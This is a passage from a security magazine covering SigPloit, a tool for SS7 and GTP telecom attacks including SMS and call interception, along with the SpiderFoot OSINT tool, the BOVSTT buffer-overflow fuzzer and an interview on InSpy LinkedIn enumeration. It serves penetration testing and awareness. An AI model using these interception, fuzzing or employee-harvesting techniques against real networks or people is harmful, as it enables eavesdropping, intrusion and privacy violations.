Visitor Location Register (VLR): Each VLR is responsible for a specific region. Every subscriber roaming in a spe-

cific region is attached/connected to the VLR responsible for this region. The VLR acts as a temp database for the pe-

riod of the roaming subscriber. It has the same info as the home network HLR.

Mobile Switching Centre (MSC): Each group of cells/BTS/towers are connected to an MSC. The MSC is responsi-

ble to route and switch calls, SMS and data from and to the subscribers attached to it.

Short Message Switching Centre (SMSC): Responsible for sending and delivering short messages (SMS) to sub-

scribers.

Signal Transfer Point (STP): It acts as the gateway (i.e., router) of the operators, which is responsible for all the 

routing, path determination and relaying of the SS7 messages.

Along the usage of SS7 within the core network, but its threat lies in the interconnections between roaming operators.

By design, protocol SS7 is vulnerable as it doesn't count for any authentication between the transmitting and receiving 

nodes, neither encryption to hide the critical data being transferred nor integrity check to emphasize that no data has 

been tampered with.

Also, SS7 is vulnerable by its implementation inside the operators, as there is no filtration done, no checking, and I as-

sume, no monitoring from a security perspective.

The below diagram shows a simple call interception, by using ‘registerSS’ message that will enable the attacker to 

subscribe/enable on behalf of the subscriber the call forwarding feature and forward all the incoming calls to a route-
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able number (i.e., DID assigned to a PBX) that is held by the attacker. The attacker is then able through the PBX to re-

cord the call, and forward the call back at his will to the target. 

Fig 2. Call Interception

GPRS Tunneling Protocol (GTP)

GTP protocol is used to send the traffic within PS core and GRX cloud (data roaming). This is a tunneling protocol, 

which runs over UDP and has a GTP-C for management purposes, GTP-U for transmitting user data, and GTP’ for bill-

ing, each running on its respective UDP port.

Service GPRS Support Node (SGSN) and Gateway GPRS Support Node (GGSN) are the basic elements for data trans-

mission. SGSN is used to provide subscribers with data transmission services and it also interacts with other network 

elements; the GGSN is the mobile gateway to the Internet.

Fig 3. Packet core (Source:Positive Technologies:Vuln. Of mobile internet)

Having access to the GRX network allows an attacker to perform various attacks on subscribers of any operator, from 

scanning valid IMSI, re-routing internet traffic for interception, etc.
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Fig 4. Data Interception (Source:Positive Technologies:Vuln. Of mobile internet)

An attacker can intercept data sent between the target’s device and the Internet by sending an “Update PDP ContextRe-

quest” message with spoofed GSN addresses to SGSN and GGSN. Thus the attacker can listen to traffic or spoofing traf-

fic from the victim.

That was a brief on the two protocols used in the framework, the attacks and vulnerabilities are publicly disclosed.

SigPloit

Fig 5. SigPloit Main
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The framework is built on several versions, illustrated below

Version 1: SS7 Module

Version 2: Diameter Module

Version 3: GTP Module

Version 4: SIP Module

Each of which are targeting specific mobile generation (2G, 3G or 4G)

Diving into the modules

First things first, let’s see how can we use the framework, it's as simple as click and play. Download it from github (see 

Annex A.).

After cloning SigPloit from github to run it's as simple as 

$ cd bin

$ python SiGploit.py

SigPloit requires some access to the telecom cloud (which is not hard to acquire), each signaling protocol has its own 

means of access, for example, the SS7 requires acquiring a global title, a point code and a provider to connect to (all 

these parameters are provided by the access provider), SIP.

Due to that, SigPloit could be run in two main modes: 

Fig 6. Modes

1) Simulation Mode: Where you can test the attacks in a virtual lab, a server side code and the used parameters are 

provided as well to simulate the node that should respond to the generated attack along with data returned only for il-

lustration on how critical the attacks are and how revealing they could be.
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Fig 7. Simulation Mode

2) Live mode: if you have the required access to the signaling protocol in use, you can happily start testing against 

live networks.

As of this date, SigPloit is in its first version testing phase, SS7 Module. The SS7 Module has three main attack catego-

ries:

1) Location Tracking

2) SMS and Call Interception

3) Fraud

Fig 8. SS7 Attacks

Each of the attacks has several message signaling units (MSU) or simply SS7 messages that are used for attacks, each 

of which have their own risk and ways of detection and mitigation. 

Let's try out the SMS Interception attack.

Fig 9. SMS Interception
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Choosing UpdateLocation message in this attack; UL is recognized as a category 3 message. All category 3 messages 

are to be allowed by the operators as they provide the essential operations for mobility. Below is an illustration of the 

parameters used with this message along with the nodes involved.

Fig 10. UL Attack Illustration

Running the attack.

Fig 11. SigPloit SMS Interception Attack
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There are parameters that are common for all messages, the parameters used for routing and setting up association 

with the SS7 provider, and the parameters that are specific for each attack. The common parameters are the point code 

(PC), those are the point to point values provided by the SS7 provider used for routing, as well as the global title, which 

is similar to the public IP in TCP/IP networks.

The specific parameters required to launch this attack are the IMSI, that could be required from other attacks, and the 

current MSC GT of the target in case of forwarding the SMS to the target for more attack persistence.

The returned results in this case is the SMS that was sent to the target of IMSI “602027891234567” which is “Hello 

world!”

More to add that SMS is transmitted in clear text.

Fig 12. SMS packet in clear text

The GTP and Diameter, currently under development, module as well depend on you having access to the IPX/GRX 

cloud, which is yet as easy as the SS7 access. As explained in previous sections, GTP has the same vulnerabilities as SS7 

regarding no authentication, no integrity checks on the sent messages thus it could easily send crafted messages to spy 

on the mobile internet data traffic, as also it inherits the UDP vulnerabilities it's easy to conduct man-in-the-middle 

attacks.

The SIP module will focus much on how we could encapsulate SS7 messages within SIP headers and body, SQL injec-

tion using SIP to extract data from the HSS (the HLR in 4G). The SIP access is the easiest as you only need to send a 

traffic through an IMS capable device.

The project is still in its early beginnings, the contributions, ideas and feedback from the community are always wel-

comed.
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Annex A.

Terminology:

Global Title (GT): Each node in the core of the operator (msc, vlr, etc.) have their own address (i.e., public IP) in a 

format of an international number, example: +441234567890. This is the address used for routing traffic to and from 

and the nodes between the operators.

Point Code (PC): Communication in SS7 network is done on a hop by hop basis in order to reach the final destina-

tion (GT). PC is 4-5 digits that determines the next peer hop that packets should go through (STP) in order to reach the 

destination. When you get an SS7 access, your SS7 provider is your peer, and the peer PC should be set to their Point 

Code.

International Mobile Subscriber Identity (IMSI): Is the most important target parameter. It is the subscriber 

ID used in all operations within the home operator or for roaming operations between operators. This is the first sub-

scriber info that should be gathered as all critical and important attacks (i.e., interception, fraud) are done with IMSI.

Mobile Station International Subscriber Directory Number (MSISDN): The phone number.

International Mobile Equipment Identity (IMEI): is a unique number for each mobile hardware. The IMEI 

number is used by a GSM network to identify valid devices and therefore can be used for stopping a stolen phone from 

accessing that network. For example, if a mobile phone is stolen, the owner can call their network provider and in-

struct them to blacklist the phone using its IMEI number. The importance of this info is that some extension of IMEI 

(IMEISV) provides the software version as well of the handset, allowing you to initiate a more targeted client side at-

tack.

Happy SigPloitation!

Github Link: github.com/SigPloiter/SigPloit

58

SigPloit:Your Way Through The “Telecom Backyard”

http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org


SPIDERFOOT: 
Open Source 

Intelligence Automation

by Steve Micallef 



60

ABOUT THE AUTHOR

Steve Micallef 

I have been working in Information Security for over 15 years but my interest in 

this field goes back to the days before the Internet was mainstream and people 

learned about security through downloading text files from BBSs. 

For over 10 years I held various security positions in one of the world's largest 

banks, more recently as the Head of Cyber Security. Right now I'm the Head of 

Security at a dynamic company in Switzerland poised to change the face of mo-

bile banking.



SpiderFoot: Open Source Intelligence Automation

Note: The first part of this article is an adapted version of SpiderFoot’s online documentation, de-
signed to get you up and running quickly for the use case presented later. For more complete docu-
mentation, check out www.spiderfoot.net.

What is SpiderFoot?

SpiderFoot is an open source intelligence (OSINT) automation tool. Its goal is to automate the process of gathering as 

much intelligence as possible about a given target, which may be an IP address, domain name, hostname or network 

subnet.

SpiderFoot can be used offensively, i.e. as part of a black-box penetration test to gather information about your target, 

or defensively to identify what information your organisation is freely providing for attackers to use against you. It util-

ises over fifty data sources to build this information, with more and more data sources added with every release, since 

2012.

Downloading

SpiderFoot is 100% open source and avai lable for download from the SpiderFoot website, 

http://www.spiderfoot.net/download/. You can download the source as a tarball for Linux/BSD/Solaris, or as an ex-

ecutable for Windows.

What you need

SpiderFoot is written in Python (2.7), so to run it on Linux/BSD/Solaris. you just need Python 2.7.x installed, in addi-

tion to the lxml, netaddr, M2Crypto, CherryPy and Mako modules.

To install the dependencies using ‘pip’, run the following:

~$ pip install lxml netaddr M2Crypto cherrypy mako

Other modules such as MetaPDF, SOCKS and more are included in the SpiderFoot package, so you don’t need to in-

stall them separately.

For Windows, no dependencies need to be installed.

Installing and starting SpiderFoot

Simply unzip/untar the package into a folder of your choice and you are ready to go! 
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To then run SpiderFoot, it differs slightly depending on your platform.

Linux/BSD/Solaris

Execute sf.py from the directory you extracted SpiderFoot into:

~/spiderfoot-X.X.X$ python ./sf.py

Once executed, a web-server will be started, which by default will listen on 127.0.0.1:5001. You can then use the web-

browser of your choice by browsing to http://127.0.0.1:5001.

If you wish to make SpiderFoot accessible from another system, for example running it on a server and controlling it 

remotely, then you can specify an external IP for SpiderFoot to bind to, or use 0.0.0.0 so that it binds to all addresses, 

including 127.0.0.1:

~/spiderfoot-X.X.X$ python ./sf.py 0.0.0.0:5001

If port 5001 is used by another application on your system, you can change the port:

~/spiderfoot-X.X.X$ python ./sf.py 127.0.0.1:9999

Windows

All that’s needed is to run sf.exe from the folder you unzipped the package to:

C:\SpiderFoot>sf.exe

As with Linux, you can also specify the IP and port to bind to:

C:\SpiderFoot>sf.exe 0.0.0.0:9999

Caution!

By default, SpiderFoot does not authenticate users connecting to its user-interface or serve over HTTPS, so avoid run-

ning it on a server/workstation that can be accessed from untrusted devices, as they will be able to control SpiderFoot 

remotely and initiate scans from your devices. As of SpiderFoot 2.7, to use authentication and HTTPS, see the online 

documentation for more information.

API Keys

SpiderFoot doesn’t require API keys to provide you with a lot of data, but API keys to certain sources will definitely 

add value. The online SpiderFoot documentation contains instructions on how to obtain the various API keys for mod-

ules like SHODAN, IBM’s X-force and others.
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Using SpiderFoot

Running a Scan

When you run SpiderFoot for the first time, there is no historical data, so you should be presented with a screen like 

the following:

To initiate a scan, click on the ‘New Scan’ button in the top menu bar. You will then need to define a name for your 

scan (these are non-unique) and a target (also non-unique):
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You can then define how you would like to run the scan - either by use case (the tab selected by default), by data re-

quired or by module.

Module-based scanning is for more advanced users who are familiar with the behavior and data provided by different 

modules, and want more control over the scan:

Beware though, there is no dependency checking when scanning by module, only for scanning by required data. This 

means that if you select a module that depends on event types only provided by other modules, but those modules are 

not selected, you will get no results.

Scan Results

From the moment you click ‘Run Scan’, you will be taken to a screen for monitoring your scan in near real time:
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That screen is made up of a graph showing a breakdown of the data obtained so far plus log messages generated by 

SpiderFoot and its modules.

The bars of the graph are clickable, taking you to the result table for that particular data type.

Browsing Results

By clicking on the ‘Browse’ button for a scan, you can browse the data by type:
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This data is exportable and searchable. Click the Search box to get a pop-up explaining how to perform searches.

By clicking on one of the data types, you will be presented with the actual data:

The fields displayed are explained as follows:
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• Checkbox field: Use this to set/unset fields as false positive. Once at least one is checked, click the orange False 

Positive button above to set/unset the record.

• Data Element: The data the module was able to obtain about your target.

• Source Data Element: The data the module received as the basis for its data colletion. In the example above, the 

sfp_portscan_tcp module received an event about an open port, and used that to obtain the banner on that 

port.

• Source Module: The module that identified this data.

• Identified: When the data was identified by the module.

You can click the black icons to modify how this data is represented. For instance you can get a unique data representa-

tion by clicking the Unique Data View icon:

Setting False Positives

Version 2.6.0 introduced the ability to set data records as false positive. As indicated in the previous section, use the 

checkbox and the orange button to set/unset records as false positive:

Once you have set records as false positive, you will see an indicator next to those records, and have the ability to filter 

them from view, as shown below:
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NOTE: Records can only be set to false positive once a scan has finished running. This is because setting a record to 

false positive also results in all child data elements being set to false positive. This obviously cannot be done if the scan 

is still running and can thus lead to an inconsistent state in the back-end. The UI will prevent you from doing so.

The result of a record being set to false positive, aside from the indicator in the data table view and exports, is that 

such data will not be shown in the node graphs.

Searching Results

Results can be searched either at the whole scan level, or within individual data types. The scope of the search is deter-

mined by the screen you are on at the time.
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As indicated by the pop-up box when selecting the search field, you can search as follows:

• Exact value: Non-wildcard searching for a specific value. For example, search for 404 within the HTTP Status 

Code section to see all pages that were not found.

• Pattern matching: Search for simple wildcards to find patterns. For example, search for *:22 within the Open 

TCP Port section to see all instances of port 22 open.

• Regular expression searches: Encapsulate your string in ‘/’ to search by regular expression. For example, 

search for ‘/\d+.\d+.\d+.\d+/’ to find anything looking like an IP address in your scan results.

Managing Scans

When you have some historical scan data accumulated, you can use the list available on the ‘Scans’ section to manage 

them:

You can filter the scans shown by altering the Filter drop-down selection. Except for the green refresh icon, all icons on 

the right will all apply to whichever scans you have checked the checkboxes for.

How SpiderFoot works

The core purpose of SpiderFoot is to return as much data as possible that is relevant to the target specified for the 

scan. But of course, different data matter to different people depending on the purpose of the scan. For instance, when 

using SpiderFoot to investigate a potentially malicious IP address, you would enable one set of modules, but if you 

wanted to see what the footprint of your organisation looked like, a different or broader set of modules might be en-

abled.

On that basis, the collection of data is distributed across different modules, each with their own purpose. For example, 

sfp_bingsearch, sfp_googlesearch and sfp_yahoosearch each query the respective search engines for 

potential URLs associated with your target.
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When a module discovers a piece of data, that data is transmitted to all other modules that are ‘interested’ in that data 

type for processing. Those modules will then act on that piece of data to identify new data, and in turn generate new 

events for other modules which may be interested, and so on.

For example, the sfp_dns module may identify an IP address associated with your target, notifying all interested 

modules. One of those interested modules would be the sfp_ir module, which will take that IP address and identify 

the netblock it is a part of, the BGP ASN and so on.

This might be best illustrated by looking at module code. For example, the sfp_names module looks for TAR-

GET_WEB_CONTENT and EMAILADDR events for identifying human names in that content:

# What events is this module interested in for input 
# * = be notified about all events.  

def watchedEvents(self):  
    return ["TARGET_WEB_CONTENT", "EMAILADDR"]  
 

# What events this module produces  
# This is to support the end user in selecting modules based on events 
# produced.  

def producedEvents(self):  
    return ["HUMAN_NAME"]  

Meanwhile, as each event is generated to a module, it is also recorded in the SpiderFoot database for reporting and 

viewing in the UI. What you see when browsing result in SpiderFoot are essentially all the events generated between 

modules.
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Use Case: binarypool.com

Now, to illustrate the capabilities of SpiderFoot, it’s really necessary to run it against a target and explore the results, 

showing how it all fits together along the way.

Running the scan

So, I ran a scan against my own domain name - binarypool.com - and let it run until completion. For the sake of speed, 

I disabled the port scanning and TLD search modules, as I know those can take a long time:

After half an hour, I had a completed scan:

Let’s now open the results and have a quick browse through the more interesting entries:
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… and even more as I scroll down! Not bad for such a small site, right? 

The data collection process

Of course, a lot of this data is somewhat “dumb” in the sense that it could be obtained quite simply using stand-alone 

command-line tools, but the power of SpiderFoot is that a) this data is now all in one place to be analysed and b) the 

data obtained by one mechanism is then used to feed another, so a more complete picture can be built up - all auto-

matically. 

For example, if we are starting from a domain name, here is just a snippet of what SpiderFoot might do with it:

• Look up DNS records for the domain

• Look up reputation information for the domain

• Brute-force some potential hostnames

• Attempt to web-crawl those sites

• Capture header information
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• Identify web server software used

• Analyse the content to identify what technologies are used

• JavaScript frameworks

• Password-accepting pages, etc.

• Is HTTPS used?

• If so, gather SSL certificate information

• What external sites are linked to?

• Do they link back? If so, they are an ‘Affiliate’

• Look up information about the affilaites

• Look for interesting filenames (e.g. PDFs)

• Extract information about the software used

• Obtain human names from the content

• Look them up on Facebook

• Look them up on LinkedIn

• Capture any e-mail addresses mentioned

• Look them up on HaveIBeenPwned.com

• Look for mentioning of hostnames and web-crawl them them

• Resolve the IPs for those hosts

• Look them up in threat intelligence lists

• Port scan them

• Port open? Grab the banner!

• Get GeoIP information
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Looking at that process above, you can see how deep the nesting can go (and this is just a simplified version). For in-

stance, file meta data might contain an e-mail address, which might mention a new sub-domain 

(steve@somehost.binarypool.com) which if you try and web crawl, may reveal even more information, and so on. This 

is why some SpiderFoot scans can take hours or sometimes even days for larger sites - there is a huge treasure-trove of 

information to be gathered and analysed, and each piece of new information can lead to even more information!

Let’s now quickly browse through some of the more interesting data found from the binarypool.com scan.

Pathways to knowledge

One of my favorite visualisations is the dendrogram. Looking at the Co-Hosted Sites data, I can see the path that 

SpiderFoot went on to obtain this information:

Above, we see (the visualisation isn’t perfect - mousing-over the data points is necessary sometimes) from the user-

supplied domain name of binarypool.com, a URL was found on Bing. From there, a hostname was extracted, and from 

there an IP address. Looking up that IP address using the different available sources for passive DNS (XForce, Bing, 
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Robtex.com), we find that other hosts also resolve to that IP and - surprise surprise - they are other sites owned by me 

that sit on the same server.

Let’s look at another example, now to see if binarypool.com is in shady territory, so we look at the Malicious IP on 
the Same Subnet list:

By clicking on any of the above link, the raw data will provide more details about the neighboring hosts and what their 

respective issues are. The below dendrogram shows how SpiderFoot obtained this information - basically from the IP 

of the web server, it found the parent netblock and then queried different block-lists and threat intelligence feeds for 

IPs within that netblock:
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And finally, we see an interesting entry under the Hacked Email Address type

Funny, it looks like no one was immune to the LinkedIn hack...

Next Steps

I hope you enjoyed reading this article and enjoy using SpiderFoot as much as I enjoyed creating it! Just a few things 

to note before going onto running your own scan…

• Be careful. Some scanning can be considered intrusive by some companies, so ensure you have the OK from 

whoever you are scanning before doing so.

• Be smart about the modules you choose. Some modules (like TLD search) can take a long time, and you 

often don’t need to enable all modules. Instead, try scanning by Use Case and select the one that best fits your 

needs.

• Configuration matters. Take some time to go through the SpiderFoot settings and tweak them to your 

needs. Also, the API keys (at least at the time of writing) are all freely available, so spend a few minutes register-

ing for the various sites that provide them and use them with SpiderFoot. You won’t regret it!

• Get in contact! I love hearing from SpiderFoot users, whether it’s about an issue you are having, a feature re-

quest or just a short thank you, it’s always appreciated. You can follow me on Twitter @binarypool to get up-

dates on upcoming releases and other relevant stuff to the tool or OSINT in general.
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BOVSTT

Buffer Overflow Vulnerability Services Tester Tool

Author: Ivan Ricart Borges

Platform: Microsoft Windows

IDE: DEV-C ver-4.9.9.2

Compiler: MinGW

Dependences: Libwsock32.a

Version: 2.5

Project: https://github.com/iricartb/buffer-overflow-vulnerability-services-tester-tool

Mail: iricartb@gmail.com

Linkedin: https://www.linkedin.com/in/ivan-ricart-borges

1. DETAILED OVERVIEW

Program to detect the existence of remote / local stack-based buffer-overflow vulnerabilities using the standard com-

munication protocol for each service.

The application allows one to customize the testing mechanism of each service through templates, these templates are 

simply plain text files that accept some kind of special words (see STF section), and these files are stored in the <serv-

ices> folder with a direct association between the protocol and the template and with the extension STF (Service 

Tester File).

Currently, the application version 2.5 supports the FTP, IMAP, POP3 and SMTP protocol.

To carry out this task, the application allows one to specify different types of parameters.

1.1. PARAMETERS

1.1.1. Application Layer Protocol

   Description: Specifies the type of protocol to be tested.
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   Required: Yes

   Options: -ap --application-layer-protocol <protocol>

   Accepted values: FTP, POP3 or SMTP

1.1.2. Target Hostname IP

Description: Specifies host / IP address to be tested

Required: Yes

Options: -th --target-hostname-ip <hostname>

Accepted values: Any valid host / IP address.

1.1.3. Target Port

Description: Specifies the destination port of the service.

Required: No

Options: -tp --target-port <port>

Accepted values: 1 - 65535

If the user does not enter this parameter, the application will automatically try to connect to the de-

fault destination port according to the service and the type of encryption.

For example, for POP3 service and SSL encryption, the default port would be 995.

1.1.4. Cryptographic Security Protocol

Description: Specifies the type of service encryption.

Required: No

Options: -cp --cryptographic-security-protocol <crypt protocol>

Accepted values: SSL, TLS

Note: No support yet.

1.1.5. Login Username
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Description: Specifies the user of the credentials.

Required: No

Options: -lu --login-username <username>

Accepted values: Alphanumeric value.

This parameter allows one to customize the authentication mechanism of the protocol.

The application will initiate the authentication protocol through user / password as soon as it reads 

the #AUTH macro within the STF file associated with the protocol. If the authentication by user / 

password fails, the program will cancel its execution.

Every time the application reads the keyword <login-username> inside the STF file, it will be re-

placed by the value of this parameter.

1.1.6. Login Password

Description: Specifies the password of the credentials.

Required: No

Options: -lu --login-password <password>

Accepted values: Alphanumeric value.

This parameter allows one to customize the authentication mechanism of the protocol.

Every time the application reads the keyword <login-password> inside the STF file, it will be re-

placed by the value of this parameter.

1.1.7. Buffer Size Length

Description: Specifies the buffer size.

Required: No

Options: -bs --buffer-size-length <size>

Accepted values: Numeric value greater than 0.

Default value: 1024

This parameter allows one to customize the size of the buffer to send.
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Every time the application reads the keyword <buffer> inside the STF file, it will be replaced by 

the sentence { --buffer-character } * { --buffer- size-length }, in this case, for example, A*1024.

1.1.8. Buffer Character

Description: Specifies the buffer character.

Required: No

Options: -bc --buffer-character <character>

Accepted values: Alphanumeric value.

Default value: ‘A’

1.1.9. 1.1.9 Output Verbose

Description: Specifies whether the user wants to obtain more information during the negotiation 

process

with the remote host.

Required: No

Options: -ov --output-verbose

Accepted values: none

1.1.10. Credits

Description: View the author of the program.

Required: No

Options: -c --credits

Alone: Yes, cannot be combined with another parameter.

1.1.11. 1.1.11 Version

Description: View the version of the program.

Required: No

Options: -v --version
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Alone: Yes, cannot be combined with another parameter.

1.2. STF FILES

1.2.1. Description

The STF files could be considered a template, they are simply plain text files that accept some kind 

of special words, these files are stored in the <services> folder with a direct association between the 

protocol and the template and with the extension STF (Service Tester File).

For example, for the FTP protocol there is an STF file in the <services> folder called FTP.stf, for 

SMTP there is an STF file called SMTP.stf and so on.

Once the connection to the remote host is established, the application begins to read the correspond-

ing STF file, later it’ll read line by line until finalizing the file or until it finds an error.

Each line of the file represents a command to send to the remote host, with the particularity 

that it accepts a series of keywords that will be translated at runtime, these keywords are as follows:

<login-username>: Each time the application finds this tag inside the file STF, this will be 

replaced by the value of the parameter -lu --login-username entered by the user.

<login-password>: Each time the application finds this tag inside the file STF, this will 

be replaced by the value of the parameter -lp --login-password entered by the user.

<buffer >: Each time the application finds this tag inside the file STF, this will be replaced 

by the values of the parameters { --buffer-character } * { --buffer- size-

length } entered by the user.

<remote-domain>: Each time the application finds this tag inside the file STF, this will be 

replaced by the domain value of the parameter -th --target-hostname-ip entered by the 

user.

These files also accept a series of macros that allow one to change the behavior of the testing mechanism. These mac-

ros are as follows:

#AUTH: Must be entered without further information, implies that all the sentences that 

follow will be executed only if the process of authentication has been satisfac-
tory. The authentication process is automatic, for this it is important that the user has en-

tered the user and password as parameters in the application.
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Its use is not obligatory, but in case of applying it we could send commands to the remote 

server where only the authenticated users can have access.

#RETURN <VALUE> : <COMMAND>: The command <COMMAND> will be sent only if a re-

turn value <VALUE> has been returned in the last send process, otherwise the test pro-

gram will stop. It could be considered a conditional command, in case the remote host has 

answered in its last command a certain value, the system continues with the test.

1.2.2. Example

Let's imagine the following file FTP.stf:

USER <buffer>

PASS <buffer>

#AUTH

MKD <buffer>

RMD <buffer>

To simplify the example, let's imagine that the user has entered the buffer size of 10 as the parame-

ter.

Once the connection to the remote host is established, the application will start reading line by line.

First it will find the sentence USER <buffer>, which will be translated by USER AAAAAAAAAA, in 

case the information is sent correctly and does not cause a buffer overflow, the application will con-

tinue with its execution.

Next, we will find the sentence PASS <buffer>, which will be translated by PASS AAAAAAAAAA, 

in case the information is sent correctly and does not cause a buffer overflow, the application will 

continue with its execution.

Next, we will find the sentence #AUTH, then the system will start the authentication mechanism of 

user / password, and if the process is successful the application will continue to read the file. Fi-

nally, we will find the sentences MKD <buffer> and RMD <buffer>, which will be translated by 

MKD and RMD AAAAAAAAAA respectively. These commands will only be sent to the remote host if 

the authentication process has been successful.
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1.3. OUTPUTS

In each of the commands sent to the remote host, the program can display three output types.

[OK]: The information has been sent correctly and no buffer overflow has been found in the sending of the in-

formation.

[FAIL ]: Error during the sending of the information, the conditional value of the #RETURN macro has not 

been met or the authentication mechanism has failed by the #AUTH macro.

[ WARNING ]: Possible buffer overflow found or connection closed by remote host.

2. COMPATIBILITY / REQUIREMENTS

Currently the system supports the Microsoft Windows platform and to generate the corresponding binary file only 

the Dev-C ++ IDE should be downloaded.

Platform: Microsoft Windows

IDE: DEV-C ver-4.9.9.2

Compiler: MinGW

Dependences: Libwsock32.a (included in Dev-C++ IDE)

The Dev-C++ IDE can be downloaded from the following link:

https://sourceforge.net/projects/dev-cpp/files/Binaries/Dev-C%2B%2B%204.9.9.2/devcpp-4.9.9.2_nomingw_setup.

exe/download?use_mirror=netix&r=&use_mirror=netix

3. COMPILATION

To compile the application the following steps must be taken:

1. Installing the Dev-C ++ IDE: Go to the next link and run the setup.  

https://sourceforge.net/projects/dev-cpp/files/Binaries/Dev-C%2B%2B%204.9.9.2/devcpp-4.9.9.2_nomi

ngw_setup.exe/download?use_mirror=netix&r=&use_mirror=netix

2. Download the GitHub project: Go to  

https://github.com/iricartb/buffer-overflow-vulnerability-services-tester-tool and press the download but-

ton in zip.
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3. Unzip the zip project using a decompression program.

4. Double click on the file BOVSTT.dev to load the Project.

5. In the Dev-C ++ IDE go to the Execute menu and click on the option to rebuild all (F12). If a dependency 

error occurs. go to point 6, otherwise go to point 7.
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6. In the Dev-C ++ IDE go to the Project menu and click on the option Project options (1), later go to pa-

rameters tab (2) and delete the line that appears in the Linker section (3), then click on the add library 
button and finally find the libwsock32.a library in the lib folder of the Dev-C ++ IDE

(5), select it and return to point 5.
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7. At this point the BOVSTT.exe executable file should exist. Run the Windows cmd.exe console and browse 

the filesystem until you find the project path.

8. Finally run the BOVSTT.exe file with its parameters to start the test process.
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In the following screenshot, you can see how the program detects the existence of a buffer overflow on the FTP service 

of the program FreeFloat FTP Server. 

If you want you can see the corresponding video using the following link:

https://www.youtube.com/watch?v=ijsBqSLmRpY

4. RUN THE PROGRAM WITHOUT COMPILATION

You can run the program without having to do the steps described in section 3, only with running the file BOVSTT.exe 

through Windows console.
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INSPY
A LinkedIn 

Enumeration Tool

by Jonathan Broche



Interview by Krystyna Chmie-

larz with Jonathan Broche 

[Hakin9 Magazine]: Hello Jonathan! Thank you 

for agreeing for the interview, we are honored! 

How have you been doing? Can you tell us some-

thing about yourself?

[Jonathan Broche]: Hi there, the honor is all mine, 

thank you for selecting me for the interview. I have 

been doing well, but busy. There are lots of things 

in motion right now and with InSpy being accepted 

into Kali Linux -- it’s been exciting to say the least!

[H9]: Can you tell us more about your InSpy tool? 

[JB]: Sure thing! InSpy is a tool created to quickly 

harvest usernames and craft emails from LinkedIn.

[H9]: Where did the idea of creating it come 

from?

[JB]: I was on a plane on the way to a client’s site 

and noticed that anonymous users not logged into 

LinkedIn could view employees working at an or-

ganization by just browsing to a URL. Then I no-

ticed, if a part of the department within the URL is 

modified then even more information is obtained. I 

thought this would be great for assessments so I 

started up my VM and began coding right away. I 

had the first version of InSpy completed before I 

landed that day.

Clients often want consultants to perform social en-

gineering assessments with zero knowledge. By not 

providing the consultant any information of their 

internal policies and procedures, we, as ethical 

hackers and consultants, must use the Internet to 

obtain this information. InSpy allows consultants to 

quickly harvest those users and create emails based 

on the organization’s email format for assessments. 

[H9]: What was the most challenging part in cre-

ating your tool?

[JB]: The most challenging part was not creating it, 

but adding a feature called TechSpy. There are cur-

rently two features in InSpy: TechSpy and EmpSpy. 

TechSpy, short for Technology Spy, was created to 

crawl jobs posted on LinkedIn and to search for key-

words within these posts. For example, if a com-

pany has opened a position for an IT Analyst and 

the job requirements state that the candidate must 

have familiarity with McAfee Anti-Virus, and Micro-

soft Windows, we can use TechSpy to obtain that 

information and quickly learn that the company in 

question probably uses McAfee and has a Windows 

environment. InSpy users can quickly look at 

TechSpy results to get an idea of what the company 

is running on their internal environments based off 

these job posts.

This was the hardest feature to implement. Crawl-

ing pages and pages of job posts, finding the key-
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words within each post, and taking all that informa-

tion to output it into different formats was the chal-

l e n g i n g p a r t . 

The main benefit of this feature, however, is that us-

ers of the tool can quickly get an output of employ-

ees and their emails while also getting an overview 

of the technologies in place within the organiza-

tion. 

[H9]: Do you think there is a way - or need, even 

- to counteract this kind of intelligence gathering 

by companies wanting to keep their infrastruc-

ture more secure? 

[JB]: Yes, there definitely is a way to minimize the 

risk. Organizations should educate employees on 

not mentioning technologies implemented within 

their organization on social media. This includes tak-

ing pictures of badges or computers within the 

work environment. Refrain from mentioning tech-

nologies on job postings that will give an attacker 

insight to what’s implemented within, keep it 

vague. Lastly, remove emails displayed on the web-

site that will give an attacker knowledge to the 

email format used within the company. Attackers 

use social media (as does InSpy) to perform passive 

reconnaissance prior to crafting attacks so always 

be mindful of this.

[H9]: What about the feedback from GitHub com-

munity? Does it influence your software?

[JB]: The community loves the tool. Luckily, I have 

received a great deal of positive comments, both 

from the release of CredCrack and InSpy. While the 

community does not influence my software, I am 

always open to implementing new features to ac-

commodate the community’s wishes and needs. 

[H9]: InSpy was included in Kali Linux - congratu-

lations! Did anything about the process surprise 

you? 

[JB]: Thank you! I think the time that it took to get 

into the distribution was what really caught me off 

guard. It was a long process, I believe I submitted 

InSpy about 2-3 years ago when I first created it. I 

completely forgot about the submission until I re-

ceived a notification that the admins over at Offen-

sive Security were commenting on it.

[H9]: Any plans for the future? Are you planning 

to expand your tool, add new features?

[JB]: At this time, I am happy with InSpy’s current 

features. In the future, the plan is to create a tool 

that combines InSpy with another tool to facilitate 

OSINT for the community. I am already gathering 

information and forming ideas for this project.

[H9]: Are you currently working on any other pro-

jects you would like to share with our readers?

[JB]: Definitely! I have some ideas that will become 

new tools soon so look out for those. I am also col-
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laborating within the industry and performing re-

search to identify new attack vectors. New blog 

posts, tools, and general knowledge transfer will 

come out of that research for the community.

[H9]: Do you have any thoughts or experiences 

you would like to share with our audience? Any 

good advice?

[JB]: I would like to express my gratitude to Hakin9 

for this opportunity to share my accomplishments 

and future goals as well as to the community for its 

unconditional support and continuous feedback. I 

am always open to questions and suggestions. I 

can be reached at @jonathanbroche on Twitter. 

Thank you!
